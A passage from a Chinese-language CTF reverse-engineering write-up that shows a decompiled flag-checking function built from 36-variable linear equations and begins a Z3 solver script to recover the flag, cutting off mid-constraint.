flag[26] + 33 * flag[27] + 29 * flag[28] + 6 * flag[29] + 97 * flag[30] + 25 * flag[31] + 10 * flag[32] + 18 * flag[33] + 23 * flag[34] + 30 * flag[35] == 154052 and 97 * flag[0] + 93 * flag[1] + 10 * flag[2] + 44 * flag[3] + 28 * flag[4] + 22 * flag[5] + 17 * flag[6] + 41 * flag[7] + 47 * flag[8] + 62 * flag[9] + 42 * flag[10] + 47 * flag[11] + 61 * flag[12] + 32 * flag[13] + 31 * flag[14] + 52 * flag[15] + 47 * flag[16] + 92 * flag[17] + 42 * flag[18] + 37 * flag[19] + 7 * flag[20] + 40 * flag[21] + 48 * flag[22] + 40 * flag[23] + 11 * flag[24] + 96 * flag[25] + 51 * flag[26] + 42 * flag[27] + 66 * flag[28] + 8 * flag[29] + 89 * flag[30] + 64 * flag[31] + 30 * flag[32] + 11 * flag[33] + 8 * flag[34] + 83 * flag[35] == 147899 and 51 * flag[0] + 94 * flag[1] + 58 * flag[2] + 76 * flag[3] + 21 * flag[4] + 10 * flag[5] + 75 * flag[6] + 4 * flag[7] + 55 * flag[8] + 37 * flag[9] + 71 * flag[10] + 97 * flag[11] + 27 * flag[12] + 93 * flag[13] + 82 * flag[14] + 94 * flag[15] + 38 * flag[16] + 69 * flag[17] + 36 * flag[18] + 58 * flag[19] + 93 * flag[20] + 18 * flag[21] + 54 * flag[22] + 59 * flag[23] + 12 * flag[24] + 12 * flag[25] + 54 * flag[26] + 83 * flag[27] + 73 * flag[28] + 83 * flag[29] + 33 * flag[30] + 12 * flag[31] + 78 * flag[32] + 38 * flag[33] + 45 * flag[34] + 57 * flag[35] == 176754 and 78 * flag[0] + 29 * flag[1] + 8 * flag[2] + 47 * flag[3] + 48 * flag[4] + 88 * flag[5] + 18 * flag[6] + 88 * flag[7] + 50 * flag[8] + 58 * flag[9] + 36 * flag[10] + 88 * flag[11] + 9 * flag[12] + 74 * flag[13] + 85 * flag[14] + 5 * flag[15] + 91 * flag[16] + 58 * flag[17] + 85 * flag[18] + 46 * flag[19] + 89 * flag[20] + 76 * flag[21] + 61 * flag[22] + 6 * flag[23] + 61 * flag[24] + 78 * flag[25] + 4 * flag[26] + 48 * flag[27] + 50 * flag[28] + 69 * flag[29] + 23 * flag[30] + 70 * flag[31] + 23 * flag[32] + 15 * flag[33] + 22 * flag[34] + 68 * flag[35] == 171970 and 75 * flag[0] + 2 * flag[1] + 94 * flag[2] + 97 * flag[3] + 72 * flag[4] + 62 * flag[5] + 78 * flag[6] + 42 * flag[7] + 69 * flag[8] + 11 * flag[9] + 37 * flag[10] + 3 * flag[11] + 29 * flag[12] + 15 * flag[13] + 39 * flag[14] + 33 * flag[15] + 18 * flag[16] + 33 * flag[17] + 12 * flag[18] + 64 * flag[19] + 6 * flag[20] + 18 * flag[21] + 34 * flag[22] + 15 * flag[23] + 3 * flag[24] + 100 * flag[25] + 85 * flag[26] + 32 * flag[27] + 97 * flag[28] + 93 * flag[29] + 84 * flag[30] + 73 * flag[31] + 26 * flag[32] + 31 * flag[33] + 71 * flag[34] + 97 * flag[35] == 166497 and 59 * flag[0] + 26 * flag[1] + 48 * flag[2] + 86 * flag[3] + 58 * flag[4] + 70 * flag[5] + 61 * flag[6] + 100 * flag[7] + 63 * flag[8] + 74 * flag[9] + 26 * flag[10] + 38 * flag[11] + 24 * flag[12] + 45 * flag[13] + 52 * flag[14] + 32 * flag[15] + 91 * flag[16] + 89 * flag[17] + 19 * flag[18] + 59 * flag[19] + 87 * flag[20] + 5 * flag[21] + 15 * flag[22] + 68 * flag[23] + 72 * flag[24] + 67 * flag[25] + 2 * flag[26] + 65 * flag[27] + 46 * flag[28] + 10 * flag[29] + 33 * flag[30] + 79 * flag[31] + 11 * flag[32] + 16 * flag[33] + 73 * flag[34] + 53 * flag[35] == 173887 and 6 * flag[0] + 66 * flag[1] + 59 * flag[2] + 76 * flag[3] + 86 * flag[4] + 20 * flag[5] + 59 * flag[6] + 34 * flag[7] + 28 * flag[8] + 48 * flag[9] + 86 * flag[10] + 5 * flag[11] + 87 * flag[12] + 13 * flag[13] + 95 * flag[14] + 87 * flag[15] + 65 * flag[16] + 35 * flag[17] + 58 * flag[18] + 10 * flag[19] + 98 * flag[20] + 100 * flag[21] + 4 * flag[22] + 78 * flag[23] + 66 * flag[24] + 57 * flag[25] + 34 * flag[26] + 86 * flag[27] + 62 * flag[28] + 36 * flag[29] + 92 * flag[30] + 28 * flag[31] + 3 * flag[32] + 24 * flag[33] + 49 * flag[34] + 28 * flag[35] == 173189 and 25 * flag[0] + 48 * flag[1] + 44 * flag[2] + 16 * flag[3] + 99 * flag[4] + 100 * flag[5] + 69 * flag[6] + 26 * flag[7] + 65 * flag[8] + 32 * flag[9] + 18 * flag[10] + 65 * flag[11] + 58 * flag[12] + 72 * flag[13] + 61 * flag[14] + 56 * flag[15] + 10 * flag[16] + 78 * flag[17] + 93 * flag[18] + 98 * flag[19] + 39 * flag[20] + 43 * flag[21] + 87 * flag[22] + 12 * flag[23] + 42 * flag[24] + 100 * flag[25] + 100 * flag[26] + 47 * flag[27] + 31 * flag[28] + 51 * flag[29] + 75 * flag[30] + 10 * flag[31] + 63 * flag[32] + 48 * flag[33] + 22 * flag[34] + 87 * flag[35] == 174138 and 61 * flag[0] + 13 * flag[1] + 100 * flag[2] + 59 * flag[3] + 31 * flag[4] + 9 * flag[5] + 28 * flag[6] + 7 * flag[7] + 27 * flag[8] + 63 * flag[9] + 11 * flag[10] + 57 * flag[11] + 95 * flag[12] + 79 * flag[13] + 21 * flag[14] + 30 * flag[15] + 60 * flag[16] + 81 * flag[17] + 43 * flag[18] + 32 * flag[19] + 30 * flag[20] + 34 * flag[21] + 80 * flag[22] + 53 * flag[23] + 28 * flag[24] + 39 * flag[25] + 74 * flag[26] + 21 * flag[27] + 18 * flag[28] + 92 * flag[29] + 73 * flag[30] + 60 * flag[31] + 21 * flag[32] + 69 * flag[33] + 76 * flag[34] + 84 * flag[35] == 157623 and 22 * flag[0] + 62 * flag[1] + 61 * flag[2] + 20 * flag[3] + 66 * flag[4] + 2 * flag[5] + 11 * flag[6] + 82 * flag[7] + 93 * flag[8] + 13 * flag[9] + 69 * flag[10] + 37 * flag[11] + 92 * flag[12] + 80 * flag[13] + 66 * flag[14] + 47 * flag[15] + 28 * flag[16] + 14 * flag[17] + 62 * flag[18] + 56 * flag[19] + 89 * flag[20] + 29 * flag[21] + 39 * flag[22] + 38 * flag[23] + 46 * flag[24] + 10 * flag[25] + 6 * flag[26] + 82 * flag[27] + 77 * flag[28] + 78 * flag[29] + 45 * flag[30] + 50 * flag[31] + 5 * flag[32] + 73 * flag[33] + 17 * flag[34] + 65 * flag[35] == 154943 and 5 * flag[0] + 84 * flag[1] + 83 * flag[2] + 77 * flag[3] + 76 * flag[4] + 60 * flag[5] + 20 * flag[6] + 48 * flag[7] + 53 * flag[8] + 14 * flag[9] + 98 * flag[10] + 50 * flag[11] + 37 * flag[12] + 15 * flag[13] + 31 * flag[14] + 69 * flag[15] + 55 * flag[16] + 37 * flag[17] + 64 * flag[18] + 35 * flag[19] + 26 * flag[20] + 20 * flag[21] + 18 * flag[22] + 67 * flag[23] + 50 * flag[24] + 57 * flag[25] + 60 * flag[26] + 71 * flag[27] + 4 * flag[28] + 35 * flag[29] + 23 * flag[30] + 52 * flag[31] + 11 * flag[32] + 15 * flag[33] + 83 * flag[34] + 51 * flag[35] == 156078 and 33 * flag[0] + 47 * flag[1] + 89 * flag[2] + 52 * flag[3] + 89 * flag[4] + 55 * flag[5] + 98 * flag[6] + 28 * flag[7] + 48 * flag[8] + 90 * flag[9] + 69 * flag[10] + 29 * flag[11] + 68 * flag[12] + 24 * flag[13] + 19 * flag[14] + 18 * flag[15] + 44 * flag[16] + 27 * flag[17] + 14 * flag[18] + 64 * flag[19] + 15 * flag[20] + 31 * flag[21] + 23 * flag[22] + 2 * flag[23] + 36 * flag[24] + 45 * flag[25] + 37 * flag[26] + 71 * flag[27] + 61 * flag[28] + 92 * flag[29] + 28 * flag[30] + 64 * flag[31] + 13 * flag[32] + 66 * flag[33] + 98 * flag[34] + 3 * flag[35] == 156158 and 80 * flag[0] + 88 * flag[1] + 68 * flag[2] + 66 * flag[3] + 46 * flag[4] + 75 * flag[5] + 32 * flag[6] + 19 * flag[7] + 36 * flag[8] + 83 * flag[9] + 63 * flag[10] + 86 * flag[11] + 79 * flag[12] + 30 * flag[13] + 61 * flag[14] + 50 * flag[15] + 100 * flag[16] + 52 * flag[17] + 66 * flag[18] + 30 * flag[19] + 20 * flag[20] + 97 * flag[21] + 45 * flag[22] + 46 * flag[23] + 38 * flag[24] + 21 * flag[25] + 32 * flag[26] + 79 * flag[27] + 68 * flag[28] + 43 * flag[29] + 65 * flag[30] + 47 * flag[31] + 86 * flag[32] + 30 * flag[33] + 74 * flag[34] + 18 * flag[35] == 181770 and 11 * flag[0] + 58 * flag[1] + 95 * flag[2] + 67 * flag[3] + 96 * flag[4] + 74 * flag[5] + 60 * flag[6] + 11 * flag[7] + 21 * flag[8] + 14 * flag[9] + 100 * flag[10] + 60 * flag[11] + 70 * flag[12] + 92 * flag[13] + 92 * flag[14] + 39 * flag[15] + 43 * flag[16] + 52 * flag[17] + 5 * flag[18] + 22 * flag[19] + 90 * flag[20] + 70 * flag[21] + 12 * flag[22] + 52 * flag[23] + 36 * flag[24] + 21 * flag[25] + 45 * flag[26] + 59 * flag[27] + 74 * flag[28] + 46 * flag[29] + 11 * flag[30] + 60 * flag[31] + 8 * flag[32] + 52 * flag[33] + 14 * flag[34] + 77 * flag[35] == 173577 and 57 * flag[0] + 37 * flag[1] + 94 * flag[2] + 43 * flag[3] + 53 * flag[4] + 55 * flag[5] + 7 * flag[6] + 83 * flag[7] + 91 * flag[8] + 61 * flag[9] + 86 * flag[10] + 6 * flag[11] + 44 * flag[12] + 87 * flag[13] + 61 * flag[14] + 92 * flag[15] + 24 * flag[16] + 74 * flag[17] + 100 * flag[18] + 22 * flag[19] + 12 * flag[20] + 68 * flag[21] + 19 * flag[22] + 88 * flag[23] + 81 * flag[24] + 83 * flag[25] + 70 * flag[26] + 39 * flag[27] + 30 * flag[28] + 82 * flag[29] + 30 * flag[30] + 35 * flag[31] + 55 * flag[32] + 18 * flag[33] + 27 * flag[34] + 80 * flag[35] == 180922 and 80 * flag[0] + 14 * flag[1] + 5 * flag[2] + 89 * flag[3] + 71 * flag[4] + 82 * flag[5] + 44 * flag[6] + 8 * flag[7] + 33 * flag[8] + 26 * flag[9] + 77 * flag[10] + 49 * flag[11] + 36 * flag[12] + 90 * flag[13] + 73 * flag[14] + 71 * flag[15] + 66 * flag[16] + 4 * flag[17] + 37 * flag[18] + 78 * flag[19] + 38 * flag[20] + 18 * flag[21] + 15 * flag[22] + 79 * flag[23] + 6 * flag[24] + 74 * flag[25] + 18 * flag[26] + 85 * flag[27] + 56 * flag[28] + 53 * flag[29] + 90 * flag[30] + 75 * flag[31] + 52 * flag[32] + 2 * flag[33] + 13 * flag[34] + 54 * flag[35] == 158596 and 96 * flag[0] + 29 * flag[1] + 37 * flag[2] + 70 * flag[3] + 92 * flag[4] + 80 * flag[5] + 24 * flag[6] + 36 * flag[7] + 32 * flag[8] + 29 * flag[9] + 78 * flag[10] + 45 * flag[11] + 58 * flag[12] + 55 * flag[13] + 16 * flag[14] + 92 * flag[15] + 71 * flag[16] + 82 * flag[17] + 86 * flag[18] + 23 * flag[19] + 4 * flag[20] + 58 * flag[21] + 16 * flag[22] + 18 * flag[23] + 38 * flag[24] + 53 * flag[25] + 82 * flag[26] + 76 * flag[27] + 83 * flag[28] + 73 * flag[29] + 87 * flag[30] + 36 * flag[31] + 61 * flag[32] + 85 * flag[33] + 61 * flag[34] + 69 * flag[35] == 181072 and 14 * flag[0] + 71 * flag[1] + 53 * flag[2] + 46 * flag[3] + 59 * flag[4] + 53 * flag[5] + 22 * flag[6] + 69 * flag[7] + 67 * flag[8] + 43 * flag[9] + 23 * flag[10] + 14 * flag[11] + 77 * flag[12] + 95 * flag[13] + 19 * flag[14] + 83 * flag[15] + 79 * flag[16] + 41 * flag[17] + 12 * flag[18] + 53 * flag[19] + 3 * flag[20] + 4 * flag[21] + 65 * flag[22] + 92 * flag[23] + 64 * flag[24] + 52 * flag[25] + 3 * flag[26] + 59 * flag[27] + 89 * flag[28] + 75 * flag[29] + 12 * flag[30] + 46 * flag[31] + 61 * flag[32] + 53 * flag[33] + 97 * flag[34] + 43 * flag[35] == 163777 and 57 * flag[0] + 99 * flag[1] + 49 * flag[2] + 100 * flag[3] + 68 * flag[4] + 99 * flag[5] + 26 * flag[6] + 65 * flag[7] + 47 * flag[8] + 65 * flag[9] + 90 * flag[10] + 68 * flag[11] + 84 * flag[12] + 4 * flag[13] + 9 * flag[14] + 43 * flag[15] + 88 * flag[16] + 33 * flag[17] + 48 * flag[18] + 88 * flag[19] + 37 * flag[20] + 31 * flag[21] + 21 * flag[22] + 94 * flag[23] + 22 * flag[24] + 93 * flag[25] + 70 * flag[26] + 14 * flag[27] + 13 * flag[28] + 28 * flag[29] + 83 * flag[30] + 12 * flag[31] + 80 * flag[32] + 58 * flag[33] + 43 * flag[34] + 97 * flag[35] == 187620 and 33 * flag[0] + 94 * flag[1] + 56 * flag[2] + 48 * flag[3] + 13 * flag[4] + 44 * flag[5] + 81 * flag[6] + 42 * flag[7] + 19 * flag[8] + 96 * flag[9] + 67 * flag[10] + 79 * flag[11] + 12 * flag[12] + 67 * flag[13] + 34 * flag[14] + 72 * flag[15] + 45 * flag[16] + 48 * flag[17] + 24 * flag[18] + 71 * flag[19] + 65 * flag[20] + 13 * flag[21] + 32 * flag[22] + 97 * flag[23] + 48 * flag[24] + 42 * flag[25] + 65 * flag[26] + 95 * flag[27] + 54 * flag[28] + 9 * flag[29] + 35 * flag[30] + 57 * flag[31] + 18 * flag[32] + 20 * flag[33] + 83 * flag[34] + 76 * flag[35] == 169266 and 31 * flag[0] + 38 * flag[1] + 83 * flag[2] + 45 * flag[3] + 28 * flag[4] + 97 * flag[5] + 54 * flag[6] + 11 * flag[7] + 80 * flag[8] + 45 * flag[9] + 92 * flag[10] + 13 * flag[11] + 52 * flag[12] + 94 * flag[13] + 51 * flag[14] + 30 * flag[15] + 11 * flag[16] + 61 * flag[17] + 46 * flag[18] + 10 * flag[19] + 28 * flag[20] + 72 * flag[21] + 20 * flag[22] + 95 * flag[23] + 90 * flag[24] + 39 * flag[25] + 32 * flag[26] + 95 * flag[27] + 19 * flag[28] + 3 * flag[29] + 65 * flag[30] + 71 * flag[31] + 73 * flag[32] + 80 * flag[33] + 23 * flag[34] + 71 * flag[35] == 162587 and 9 * flag[0] + 81 * flag[1] + 80 * flag[2] + 37 * flag[3] + 96 * flag[4] + 72 * flag[5] + 95 * flag[6] + 93 * flag[7] + 26 * flag[8] + 98 * flag[9] + 50 * flag[10] + 79 * flag[11] + 57 * flag[12] + 13 * flag[13] + 49 * flag[14] + 96 * flag[15] + 82 * flag[16] + 84 * flag[17] + 89 * flag[18] + 40 * flag[19] + 38 * flag[20] + 66 * flag[21] + 81 * flag[22] + 81 * flag[23] + 79 * flag[24] + 77 * flag[25] + 86 * flag[26] + 68 * flag[27] + 26 * flag[28] + 37 * flag[29] + 15 * flag[30] + 56 * flag[31] + 13 * flag[32] + 17 * flag[33] + 50 * flag[34] + 37 * flag[35] == 198705 and 82 * flag[0] + 57 * flag[1] + 33 * flag[2] + 32 * flag[3] + 79 * flag[4] + 25 * flag[5] + 54 * flag[6] + 27 * flag[7] + 50 * flag[8] + 14 * flag[9] + 72 * flag[10] + 31 * flag[11] + 28 * flag[12] + 66 * flag[13] + 4 * flag[14] + 6 * flag[15] + 48 * flag[16] + 34 * flag[17] + 63 * flag[18] + 51 * flag[19] + 12 * flag[20] + 21 * flag[21] + 73 * flag[22] + 66 * flag[23] + 53 * flag[24] + 38 * flag[25] + 54 * flag[26] + 59 * flag[27] + 76 * flag[28] + 63 * flag[29] + 61 * flag[30] + 30 * flag[31] + 84 * flag[32] + 80 * flag[33] + 98 * flag[34] + 46 * flag[35] == 160349 and 69 * flag[0] + 15 * flag[1] + 23 * flag[2] + 8 * flag[3] + 46 * flag[4] + 55 * flag[5] + 21 * flag[6] + 91 * flag[7] + 37 * flag[8] + 9 * flag[9] + 61 * flag[10] + 20 * flag[11] + 23 * flag[12] + 96 * flag[13] + 28 * flag[14] + 67 * flag[15] + 19 * flag[16] + 50 * flag[17] + 18 * flag[18] + 71 * flag[19] + 30 * flag[20] + 14 * flag[21] + 10 * flag[22] + 24 * flag[23] + 100 * flag[24] + 15 * flag[25] + 91 * flag[26] + 15 * flag[27] + 93 * flag[28] + 24 * flag[29] + 46 * flag[30] + 61 * flag[31] + 67 * flag[32] + 60 * flag[33] + 56 * flag[34] + 81 * flag[35] == 148095: + return True + return False + +def main(): + flag = str(input('Input your flag: ')).encode() + res = check(flag) + if res: + print('Right flag!') + return None + print('Wrong flag!') + +if __name__ == '__main__': + main() + return None +``` + +其实是一个输入和一个矩阵相乘,最后与结果比较,题目的预期解是用 z3 对其求解。 + +> [!NOTE] +> +> [Z3 solver](https://github.com/Z3Prover/z3) 是由微软开发的 **可满足性模理论求解器**(**Satisfiability Modulo Theory solver**, 即 `SMT solver`),用于检查逻辑表达式的可满足性,并可以找到一组约束中的其中一个可行解(无法找出所有的可行解)。 +> +> 在 CTF 逆向题中,我们有的时候会遇到一些较为复杂的约束条件,此时可以使用 `z3` 来辅助求解。 + +下面是我的脚本,z3 的写法可以参考网上的文档。 + +```python +from z3 import * + +flag = [Int(f'flag{i}') for i in range(36)] + +solver = Solver() + +for i in range(36): + solver.add(flag[i] >= 32) + solver.add(flag[i] < 127) + +solver.add( 47 * flag[0] + 41 * flag[1] + 32 * flag[2] + 56 * flag[3] + 52 * flag[4] + 67 * flag[5] + 13 * flag[6] + 25 * flag[7] + 20 * flag[8] + 98 * flag[9] + 88 * flag[10] + 65 * flag[11] + 82 * flag[12] + 92 * flag[13] + 3 * flag[14] + 29 * flag[15] + 93 * flag[16] + 88 * flag[17] + 45 * flag[18] + 58 * flag[19] + 40 * flag[20] + 72 * flag[21] + 99 * flag[22] + 10 * flag[23] + 94 * flag[24] + 62 * flag[25] + 82 * flag[26] + 92 * flag[27] + 23 * flag[28] + 46 * flag[29] + 55 * flag[30] + 72 * flag[31] + 44 * flag[32] + 9 * flag[33] + 65 * flag[34] + 42 * flag[35] == 176386) +solver.add( 10 * flag[0] + 98 * flag[1] + 5 * flag[2] + 28 * flag[3] + 68 * flag[4] + 20 * flag[5] + 2 * flag[6] + 22 * flag[7] + 65 * flag[8] + 44 * flag[9] + 85 * flag[10] + 97 * flag[11] + 33 * flag[12] + 74 * flag[13] + 93 * flag[14] + 74 * flag[15] + 41 * flag[16] + 65 * flag[17] + 32 * flag[18] + 93 * flag[19] + 22 * flag[20] + 69 * flag[21] + 68 * flag[22] + 57 * flag[23] + 47 * flag[24] + 29 * flag[25] + 74 * flag[26] + 54 * flag[27] + 91 * flag[28] + 90 * flag[29] + 26 * flag[30] + 11 * flag[31] + 89 * flag[32] + 57 * flag[33] + 100 * flag[34] + 95 * flag[35] == 186050) +solver.add( 25 * flag[0] + 22 * flag[1] + 54 * flag[2] + 5 * flag[3] + 8 * flag[4] + 3 * flag[5] + 12 * flag[6] + 70 * flag[7] + 25 * flag[8] + 61 * flag[9] + 68 * flag[10] + 12 * flag[11] + 27 * flag[12] + 42 * flag[13] + 83 * flag[14] + 91 * flag[15] + 67 * flag[16] + 46 * flag[17] + 8 * flag[18] + 45 * flag[19] + 94 * flag[20] + 80 * flag[21] + 69 * flag[22] + 95 * flag[23] + 12 * flag[24] + 21 * flag[25] + 94 * flag[26] + 82 * flag[27] + 93 * flag[28] + 41 * flag[29] + 4 * flag[30] + 56 * flag[31] + 92 * flag[32] + 77 * flag[33] + 15 * flag[34] + 30 * flag[35] == 154690) +solver.add( 33 * flag[0] + 49 * flag[1] + 56 * flag[2] + 40 * flag[3] + 90 * flag[4] + 59 * flag[5] + 82 * flag[6] + 6 * flag[7] + 81 * flag[8] + 32 * flag[9] + 23 * flag[10] + 76 * flag[11] + 93 *flag[12] + 83 * flag[13] + 10 * flag[14] + 44 * flag[15] + 58 * flag[16] + 33 * flag[17] + 79 * flag[18] + 77 * flag[19] + 82 * flag[20] + 56 * flag[21] + 70 * flag[22] + 34 * flag[23] + 45 * flag[24] + 76 * flag[25] + 57 * flag[26] + 43 * flag[27] + 100 * flag[28] + 19 * flag[29] + 11 * flag[30] + 90 * flag[31] + 3 * flag[32] + 60 * flag[33] + 57 * flag[34] + 23 * flag[35] == 172116) +solver.add( 65 * flag[0] + 70 * flag[1] + 20 * flag[2] + 32 * flag[3] + 75 * flag[4] + 30 * flag[5] + 3 * flag[6] + 78 * flag[7] + 35 * flag[8] + 45 * flag[9] + 95 * flag[10] + 93 * flag[11] + 52 *flag[12] + 32 * flag[13] + 88 * flag[14] + 94 * flag[15] + 67 * flag[16] + 34 * flag[17] + 91 * flag[18] + 88 * flag[19] + 31 * flag[20] + 61 * flag[21] + 17 * flag[22] + 99 * flag[23] + 100 *flag[24] + 49 * flag[25] + 4 * flag[26] + 60 * flag[27] + 81 * flag[28] + 88 * flag[29] + 43 * flag[30] + 34 * flag[31] + 30 * flag[32] + 52 * flag[33] + 18 * flag[34] + 100 * flag[35] == 190544) +solver.add( 81 * flag[0] + 42 * flag[1] + 28 * flag[2] + 98 * flag[3] + 31 * flag[4] + 46 * flag[5] + 64 * flag[6] + 15 * flag[7] + 49 * flag[8] + 13 * flag[9] + 100 * flag[10] + 81 * flag[11] + 32* flag[12] + 52 * flag[13] + 59 * flag[14] + 24 * flag[15] + 94 * flag[16] + 32 * flag[17] + 93 * flag[18] + 32 * flag[19] + 13 * flag[20] + 89 * flag[21] + 37 * flag[22] + 30 * flag[23] + 78 * flag[24] + 81 * flag[25] + 9 * flag[26] + 45 * flag[27] + 93 * flag[28] + 100 * flag[29] + 97 * flag[30] + 10 * flag[31] + 80 * flag[32] + 54 * flag[33] + 88 * flag[34] + 85 * flag[35] == 190323) +solver.add( 76 * flag[0] + 54 * flag[1] + 5 * flag[2] + 14 * flag[3] + 62 * flag[4] + 44 * flag[5] + 24 * flag[6] + 29 * flag[7] + 85 * flag[8] + 87 * flag[9] + 19 * flag[10] + 3 * flag[11] + 65 * flag[12] + 24 * flag[13] + 92 * flag[14] + 37 * flag[15] + 57 * flag[16] + 20 * flag[17] + 45 * flag[18] + 5 * flag[19] + 13 * flag[20] + 91 * flag[21] + 92 * flag[22] + 75 * flag[23] + 36 * flag[24] + 79 * flag[25] + 12 * flag[26] + 22 * flag[27] + 75 * flag[28] + 82 * flag[29] + 28 * flag[30] + 82 * flag[31] + 24 * flag[32] + 53 * flag[33] + 56 * flag[34] + 92 * flag[35] == 162017) +solver.add( 53 * flag[0] + 52 * flag[1] + 72 * flag[2] + 23 * flag[3] + 26 * flag[4] + 13 * flag[5] + 62 * flag[6] + 96 * flag[7] + 67 * flag[8] + 96 * flag[9] + 66 * flag[10] + 41 * flag[11] + 5 *flag[12] + 18 * flag[13] + 37 * flag[14] + 13 * flag[15] + 61 * flag[16] + 71 * flag[17] + 91 * flag[18] + 96 * flag[19] + 56 * flag[20] + 3 * flag[21] + 65 * flag[22] + 14 * flag[23] + 57 * flag[24] + 69 * flag[25] + 75 * flag[26] + 68 * flag[27] + 10 * flag[28] + 60 * flag[29] + 62 * flag[30] + 95 * flag[31] + 53 * flag[32] + 19 * flag[33] + 7 * flag[34] + 56 * flag[35] == 165118) +solver.add( 26 * flag[0] + 7 * flag[1] + 49 * flag[2] + 14 * flag[3] + 36 * flag[4] + 87 * flag[5] + 21 * flag[6] + 35 * flag[7] + 15 * flag[8] + 91 * flag[9] + 15 * flag[10] + 100 * flag[11] + 8 *flag[12] + 32 * flag[13] + 100 * flag[14] + 35 * flag[15] + 66 * flag[16] + 3 * flag[17] + 79 * flag[18] + 96 * flag[19] + 82 * flag[20] + 95 * flag[21] + 68 * flag[22] + 13 * flag[23] + 86 * flag[24] + 51 * flag[25] + 24 * flag[26] + 76 * flag[27] + 30 * flag[28] + 60 * flag[29] + 29 * flag[30] + 70 * flag[31] + 40 * flag[32] + 90 * flag[33] + 44 * flag[34] + 3 * flag[35] == 153332) +solver.add( 47 * flag[0] + 19 * flag[1] + 37 * flag[2] + 93 * flag[3] + 73 * flag[4] + 30 * flag[5] + 45 * flag[6] + 47 * flag[7] + 72 * flag[8] + 85 * flag[9] + 37 * flag[10] + 68 * flag[11] + 89 * flag[12] + 34 * flag[13] + 4 * flag[14] + 50 * flag[15] + 87 * flag[16] + 33 * flag[17] + 87 * flag[18] + 43 * flag[19] + 9 * flag[20] + 61 * flag[21] + 93 * flag[22] + 49 * flag[23] + 74 * flag[24] + 49 * flag[25] + 68 * flag[26] + 29 * flag[27] + 54 * flag[28] + 54 * flag[29] + 37 * flag[30] + 79 * flag[31] + 33 * flag[32] + 65 * flag[33] + 59 * flag[34] + 15 * flag[35] == 168472) +solver.add( 79 * flag[0] + 73 * flag[1] + 60 * flag[2] + 62 * flag[3] + 25 * flag[4] + 16 * flag[5] + 77 * flag[6] + 81 * flag[7] + 79 * flag[8] + 31 * flag[9] + 82 * flag[10] + 84 * flag[11] + 62 * flag[12] + 36 * flag[13] + 18 * flag[14] + 20 * flag[15] + 46 * flag[16] + 57 * flag[17] + 21 * flag[18] + 40 * flag[19] + 3 * flag[20] + 50 * flag[21] + 58 * flag[22] + 80 * flag[23] + 84 * flag[24] + 71 * flag[25] + 87 * flag[26] + 3 * flag[27] + 13 * flag[28] + 77 * flag[29] + 83 * flag[30] + 39 * flag[31] + 55 * flag[32] + 34 * flag[33] + 41 * flag[34] + 63 * flag[35] == 178706) +solver.add( 7 * flag[0] + 50 * flag[1] + 26 * flag[2] + 79 * flag[3] + 21 * flag[4] + 42 * flag[5] + 83 * flag[6] + 94 * flag[7] + 63 * flag[8] + 83 * flag[9] + 3 * flag[10] + 68 * flag[11] + 25 * flag[12] + 91 * flag[13] + 3 * flag[14] + 5 * flag[15] + 17 * flag[16] + 61 * flag[17] + 3 * flag[18] + 40 * flag[19] + 87 * flag[20] + 11 * flag[21] + 27 * flag[22] + 74 * flag[23] + 73 * flag[24] + 21 * flag[25] + 56 * flag[26] + 46 * flag[27] + 36 * flag[28] + 24 * flag[29] + 14 * flag[30] + 63 * flag[31] + 21 * flag[32] + 71 * flag[33] + 30 * flag[34] + 53 * flag[35] == 143852) +solver.add( 57 * flag[0] + 51 * flag[1] + 49 * flag[2] + 15 * flag[3] + 94 * flag[4] + 34 * flag[5] + 27 * flag[6] + 5 * flag[7] + 100 * flag[8] + 68 * flag[9] + 67 * flag[10] + 81 * flag[11] + 10 * flag[12] + 5 * flag[13] + 85 * flag[14] + 70 * flag[15] + 80 * flag[16] + 20 * flag[17] + 89 * flag[18] + 30 * flag[19] + 84 * flag[20] + 35 * flag[21] + 41 * flag[22] + 87 * flag[23] + 75 * flag[24] + 67 * flag[25] + 20 * flag[26] + 33 * flag[27] + 29 * flag[28] + 6 * flag[29] + 97 * flag[30] + 25 * flag[31] + 10 * flag[32] + 18 * flag[33] + 23 * flag[34] + 30 * flag[35] == 154052) +solver.add( 97 * flag[0] + 93 * flag[1] + 10 * flag[2] + 44 * flag[3] + 28 * flag[4] + 22 * flag[5] + 17 * flag[6] + 41 * flag[7] + 47 * flag[8] + 62 * flag[9] + 42 * flag[10] + 47 * flag[11] + 61 * flag[12] + 32 * flag[13] + 31 * flag[14] + 52 * flag[15] + 47 * flag[16] + 92 * flag[17] + 42 * flag[18] + 37 * flag[19] + 7 * flag[20] + 40 * flag[21] + 48 * flag[22] + 40 * flag[23] + 11 * flag[24] + 96 * flag[25] + 51 * flag[26] + 42 * flag[27] + 66 * flag[28] + 8 * flag[29] + 89 * flag[30] + 64 * flag[31] + 30 * flag[32] + 11 * flag[33] + 8 * flag[34] + 83 * flag[35] == 147899) +solver.add( 51 * flag[0] + 94 * flag[1] + 58 * flag[2] + 76 * flag[3] + 21 * flag[4] + 10 * flag[5] + 75 * flag[6] + 4 * flag[7] + 55 * flag[8] + 37 * flag[9] + 71 * flag[10] + 97 * flag[11] + 27 *flag[12] + 93 * flag[13] + 82 * flag[14] + 94 * flag[15] + 38 * flag[16] + 69 * flag[17] + 36 * flag[18] + 58 * flag[19] + 93 * flag[20] + 18 * flag[21] + 54 * flag[22] + 59 * flag[23] + 12 * flag[24] + 12 * flag[25] + 54 * flag[26] + 83 * flag[27] + 73 * flag[28] + 83 * flag[29] + 33 * flag[30] + 12 * flag[31] + 78 * flag[32] + 38 * flag[33] + 45 * flag[34] + 57 * flag[35] == 176754) +solver.add( 78 * flag[0] + 29 * flag[1] + 8 * flag[2] + 47 * flag[3] + 48 * flag[4] + 88 * flag[5] + 18 * flag[6] + 88 * flag[7] + 50 * flag[8] + 58 * flag[9] + 36 * flag[10] + 88 * flag[11] + 9 * flag[12] + 74 * flag[13] + 85 * flag[14] + 5 * flag[15] + 91 * flag[16] + 58 * flag[17] + 85 * flag[18] + 46 * flag[19] + 89 * flag[20] + 76 * flag[21] + 61 * flag[22] + 6 * flag[23] + 61 * flag[24] + 78 * flag[25] + 4 * flag[26] + 48 * flag[27] + 50 * flag[28] + 69 * flag[29] + 23 * flag[30] + 70 * flag[31] + 23 * flag[32] + 15 * flag[33] + 22 * flag[34] + 68 * flag[35] == 171970) +solver.add( 75 * flag[0] + 2 * flag[1] + 94 * flag[2] + 97 * flag[3] + 72 * flag[4] + 62 * flag[5] + 78 * flag[6] + 42 * flag[7] + 69 * flag[8] + 11 * flag[9] + 37 * flag[10] + 3 * flag[11] + 29 * flag[12] + 15 